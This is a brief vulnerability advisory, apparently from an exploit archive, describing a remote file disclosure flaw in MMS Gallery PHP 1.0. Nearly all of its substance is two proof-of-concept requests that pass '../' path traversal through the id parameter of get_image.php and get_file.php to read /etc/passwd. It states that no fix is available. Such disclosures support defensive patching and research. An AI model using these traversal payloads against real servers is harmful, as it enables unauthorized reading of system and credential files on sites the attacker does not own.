MMS Gallery PHP 1.0 (id) Remote File Disclosure Vulnerability

2007-12-13 00:00:00

MMS Gallery in PHP v1.0 (id) Remote File Disclosure Vulnerability
D.Script : http://www.mms2web.com/mms_gallery_php.zip
POC :
/mms_template/get_image.php?id=../../../../../../../../etc/passwd
/mms_template/get_file.php?id=../../../../../../../../etc/passwd

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.